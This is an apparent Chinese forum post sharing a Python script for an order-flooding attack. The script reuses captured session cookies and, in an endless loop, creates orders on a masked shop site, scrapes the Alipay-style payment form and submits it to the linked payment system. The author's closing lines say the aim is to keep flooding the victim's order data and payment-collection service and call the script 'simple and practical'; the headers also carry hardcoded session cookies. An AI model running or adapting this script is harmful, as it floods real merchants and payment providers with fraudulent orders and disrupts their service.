8wDlpd.png
8wDFp9.png
8wDEOx.png
8wDMfH.png
8wDKte.png

python刷单攻击简单实现

admin 10月前 125

# -*- coding: utf-8 -*-

import requests
import time
import json
import re
from threading import Thread, Lock, enumerate
from logger import logger
from urllib import parse
from lxml import etree
# python2 和 python3的兼容代码
try:
    # python2 中
    import cookielib
    logger.info(f"user cookielib in python2.")
except:
    # python3 中
    import http.cookiejar as cookielib
    logger.info(f"user cookielib in python3.")

# session代表某一次连接
miSession = requests.session()
# 因为原始的session.cookies 没有save()方法,所以需要用到cookielib中的方法LWPCookieJar,这个类实例化的cookie对象,就可以直接调用save方法。
miSession.cookies = cookielib.LWPCookieJar(filename ="toodroyCookies.txt")

mutex = Lock()

userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"


header1 = {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Content-Length": "70",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "PHPSESSID=cpe360poopnn43c3j7eo6bam09; mysid=fce05212ed912ca945cf7005013416a3; sec_defend=ef9c820cca525ce48ace7fd7b1b8b9895861f347dad1451c4de2507b4ffef015; counter=16",
    "Host": "*.*",
    "Origin": "http://*.*",
    "Proxy-Connection": "keep-alive",
    "Referer": "http:///*.*cid=133&tid=3602",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "keep-alive",
}

header2 = {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "PHPSESSID=cpe360poopnn43c3j7eo6bam09; mysid=fce05212ed912ca945cf7005013416a3; sec_defend=71e15b606271ee8f54f84735836857be10e326cffc326927c7bea09092be0a69; counter=17",
    "Host": "*.*",
    "Origin": "http://",
    "Proxy-Connection": "keep-alive",
    "Referer": "http://*.*/?cid=133&tid=3602",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Connection": "keep-alive",
}

header3 = {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Cache-Control": "max-age=0",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "PHPSESSID=cpe360poopnn43c3j7eo6bam09; mysid=fce05212ed912ca945cf7005013416a3; sec_defend=71e15b606271ee8f54f84735836857be10e326cffc326927c7bea09092be0a69; counter=17",
    "Host": "*.*",
    "Origin": "http://*.*",
    "Proxy-Connection": "keep-alive",
    "Referer": "http://*.*/",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Connection": "keep-alive",
}

header4 = {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "accept-encoding": "gzip, deflate",
    "accept-language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6",
    "Cache-Control": "max-age=0",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "X_CACHE_KEY=f1015f53e5f555f042f0dc54217a505b; UM_distinctid=17b11655d513b1-0cef74f3873bf-2343360-10ae00-17b11655d52726; CNZZDATA1279952036=2036474364-1628084460-%7C1628084460; player_album=0; player_song=0; ocinkCurrTime=0; PHPSESSID=tgetb2934ic7js1534g6d72nms",
    "Host": "*.*",
    "Proxy-Connection": "keep-alive",
    "Referer": "http://*.*/submit.php",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Connection": "keep-alive",
}


def loads_jsonp(_jsonp):
    try:
        return json.loads(re.match(".*?({.*}).*",_jsonp,re.S).group(1))
    except:
        raise ValueError('Invalid Input')

if __name__ == "__main__":
	# 第一步:尝试使用已有的cookie登录
    miSession.cookies.load(ignore_discard=True, ignore_expires=True)

    postData1 = {
        "tid": '3602',
        "inputvalue": 'a',
        "num": '10',
        "hashsalt": 'b34e1503749832482a3b356cc3db97e9',
    }
    while True:
        #创建订单
        resp1 = miSession.post(
            "http://*.*/ajax.php?act=pay",data=postData1,
            headers=header1)
        logger.info(f"resp1.status_code = {resp1.status_code}")
        logger.info(f"resp1.text = {resp1.text}")
        resp1Json = loads_jsonp(resp1.text)
        logger.info(f"resp1Json = {resp1Json}")

        trade_no= resp1Json['trade_no']
        logger.info(f"trade_no = {trade_no}")

        #生成表单
        resp2 = miSession.get(
            "http://*.*/other/submit.php?type=alipay&orderid="+trade_no,
            headers=header2, allow_redirects=False)
        logger.info(f"resp2.status_code = {resp2.status_code}")
        #logger.info(f"resp2.text = {resp2.text}")
        dom = etree.HTML(resp2.text)
        money = dom.xpath('//input[@name="money"]//@value').pop()
        logger.info(f"dom.money = {money}")
        name = dom.xpath('//input[@name="name"]//@value').pop()
        logger.info(f"dom.name = {name}")
        notify_url = dom.xpath('//input[@name="notify_url"]//@value').pop()
        logger.info(f"dom.notify_url = {notify_url}")
        out_trade_no = dom.xpath('//input[@name="out_trade_no"]//@value').pop()
        logger.info(f"dom.out_trade_no = {out_trade_no}")
        pid = dom.xpath('//input[@name="pid"]//@value').pop()
        logger.info(f"dom.pid = {pid}")
        return_url = dom.xpath('//input[@name="return_url"]//@value').pop()
        logger.info(f"dom.return_url = {return_url}")
        sitename = dom.xpath('//input[@name="sitename"]//@value').pop()
        logger.info(f"dom.sitename = {sitename}")
        type = dom.xpath('//input[@name="type"]//@value').pop()
        logger.info(f"dom.type = {type}")
        sign = dom.xpath('//input[@name="sign"]//@value').pop()
        logger.info(f"dom.sign = {sign}")

        postData2 = {
            "money": money,
            "name": name,
            "notify_url": notify_url,
            "out_trade_no": out_trade_no,
            "pid":pid,
            "return_url": return_url,
            "sitename": sitename,
            "type":type,
            "sign":sign,
            "sign_type": 'MD5',
        }

        resp3 = miSession.post(
            "http://*.*/submit.php", data=postData2,
            headers=header3)
        logger.info(f"resp3.status_code = {resp3.status_code}")
        #logger.info(f"resp3.text = {resp3.text}")
        dom2 = etree.HTML(resp3.text)
        flag = dom2.xpath('//script//text()')
        if(len(flag)==0):
            notice = dom2.xpath('//body//text()')
            logger.info(f"resp3.notice = {notice}")
            time.sleep(240)
            continue
        url = dom2.xpath('//script//text()').pop().split("'")[1]
        logger.info(f"resp3.url = {url}")

        resp4 = miSession.get(
            f"http://*.*/"+url,
            headers=header4, allow_redirects=False)
        logger.info(f"resp4.status_code = {resp4.status_code}")
        #logger.info(f"resp4.text = {resp4.text}")

 没有多余的废话,简单而实用。

目标不停的刷对方的订单数据以及与之对接的代收付系统。

最新回复 (0)
    • 肚兜网
      2
        登录 注册 QQ登录暂未开通
返回
发新帖